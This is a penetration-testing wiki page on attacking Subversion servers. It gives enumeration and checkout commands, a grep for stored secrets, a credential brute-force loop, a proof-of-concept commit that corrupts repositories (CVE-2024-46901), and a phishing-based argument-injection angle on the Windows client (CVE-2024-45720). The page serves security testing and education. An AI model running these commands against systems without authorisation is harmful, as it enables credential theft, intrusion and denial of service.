3690-pentesting-subversion-svn-server.md (5766B)
1 --- 2 title: "3690/tcp - Pentesting Subversion (SVN) Server" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/3690-pentesting-subversion-svn-server.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # 3690/tcp - Pentesting Subversion (SVN) Server 14 15 ## Basic Information 16 17 **Subversion (SVN)** is a centralized **version control system** (Apache license) used for software versioning and revision control. 18 19 **Default port:** `3690/tcp` (svnserve). It can also be exposed via **HTTP/HTTPS** through `mod_dav_svn` and via **svn+ssh**. 20 21 ```text 22 PORT STATE SERVICE 23 3690/tcp open svnserve Subversion 24 ``` 25 26 ### Banner Grabbing 27 28 ```bash 29 nc -vn 10.10.10.10 3690 30 svnserve --version # if shell access is obtained 31 svn --version # client version leak via error messages 32 ``` 33 34 ## Enumeration 35 36 ```bash 37 # Anonymous / authenticated listing 38 svn ls svn://10.10.10.203 # list root 39 svn ls -R svn://10.10.10.203/repo # recursive list 40 svn info svn://10.10.10.203/repo # repo metadata 41 svn log svn://10.10.10.203/repo # commit history 42 svn checkout svn://10.10.10.203/repo # checkout repository 43 svn up -r 2 # move working copy to revision 2 44 svn diff -r 1:HEAD svn://10.10.10.203/repo # view changes 45 46 # If served over HTTP(S) 47 svn ls https://10.10.10.10/svn/repo --username guest --password '' 48 49 # Extract revision props (often contain build creds, URLs, tokens) 50 svn propget --revprop -r HEAD svn:log svn://10.10.10.203/repo 51 ``` 52 53 ### Auth & Misconfig Hunting 54 55 - `svnserve.conf` may allow `anon-access = read` (or even write). If you can list, try `checkout` to dump secrets, scripts, CI tokens. 56 - Repositories frequently store **build pipelines**, **deployment keys**, and **database credentials** in versioned config files. Grep the working copy after checkout: `grep -R "password\|secret\|token" -n .`. 57 - If svn+ssh is enabled, user shells often allow restricted `svnserve` commands; attempt `ssh user@host svnserve -t` with crafted subcommands to bypass wrappers. 58 59 ### Bruteforcing credentials (svnserve) 60 61 SASL or password-file authentication does not imply an account-lockout policy. Confirm authorization and throttling in the specific deployment before password testing, and use a small approved candidate set.<sup>[[3]](#references)</sup> 62 ```bash 63 for u in admin dev ci; do 64 for p in $(cat /tmp/passlist); do 65 svn ls --username "$u" --password "$p" svn://10.10.10.203/repo 2>/dev/null && echo "[+] $u:$p" && break 66 done 67 done 68 ``` 69 70 ## Recent Vulnerabilities (practical impact) 71 72 ### mod_dav_svn DoS via control characters (CVE-2024-46901) 73 74 - A user with commit rights can write a path containing control chars (e.g. `\x01`, `\x7f`) that **corrupts the repository**, making later checkouts/logs fail and potentially crashing `mod_dav_svn` workers.<sup>[[1]](#references)</sup> 75 - Affects Subversion ≤ **1.14.4** when served through **HTTP(S)** (`mod_dav_svn`). Fixed in **1.14.5**.<sup>[[1]](#references)</sup> 76 - PoC commit with `svnmucc` (requires valid commit creds): 77 ```bash 78 # create payload file 79 printf 'pwn' > /tmp/payload 80 # commit a path with a control character in its name 81 svnmucc -m "DoS" put /tmp/payload $'http://10.10.10.10/svn/repo/trunk/bad\x01path.txt' 82 ``` 83 - After the commit, normal clients may crash or refuse updates until admins manually remove the revision with `svnadmin dump/filter/load`. 84 85 ### Windows argument injection in svn client (CVE-2024-45720) 86 87 - On Windows, "best-fit" character encoding in `svn.exe` allows **command-line argument injection** when processing specially crafted non‑ASCII paths/URLs, potentially leading to arbitrary program execution.<sup>[[2]](#references)</sup> 88 - Affects Subversion ≤ **1.14.3** on Windows only; fixed in **1.14.4**. Attack surface: phishing a developer to run `svn` on an attacker-controlled URL/path.<sup>[[2]](#references)</sup> 89 - Pentest angle: if you control a network share or ZIP given to a Windows dev, name a repo URL or working-copy path containing best-fit bytes that decode into `" & calc.exe & "`-style injected args, then trick the victim to run `svn status` or similar on that path. 90 91 ## Notes for Exploitation Workflow 92 93 1. **Check access method**: `svn://` (svnserve), `http(s)://.../svn/` (mod_dav_svn), or `svn+ssh://`. 94 2. **Try anonymous read** first; then spray common creds. If HTTP Basic is used, reuse creds found elsewhere. 95 3. **Enumerate hooks**: `hooks/pre-commit`, `post-commit` scripts sometimes contain plaintext credentials or hostnames. 96 4. **Leverage `svn:externals`** to pull additional paths from other hosts; list them with `svn propget svn:externals -R .` after checkout. 97 5. **Version leaks**: HTTP response headers from `mod_dav_svn` may expose the Subversion and Apache versions; compare confirmed versions with the applicable advisories rather than treating a banner as proof.<sup>[[1]](#references)[[2]](#references)</sup> 98 6. If you obtain filesystem access to the repo, `svnadmin dump`/`svnlook author`/`svnlook dirs-changed` allow offline analysis without credentials. 99 100 ## References 101 102 - [1] [Apache Subversion security advisory CVE-2024-46901](https://subversion.apache.org/security/CVE-2024-46901-advisory.txt) 103 - [2] [Apache Subversion security advisory CVE-2024-45720](https://subversion.apache.org/security/CVE-2024-45720-advisory.txt) 104 - [3] [Apache Subversion book — svnserve authentication](https://svnbook.red-bean.com/en/1.8/svn.serverconfig.svnserve.html)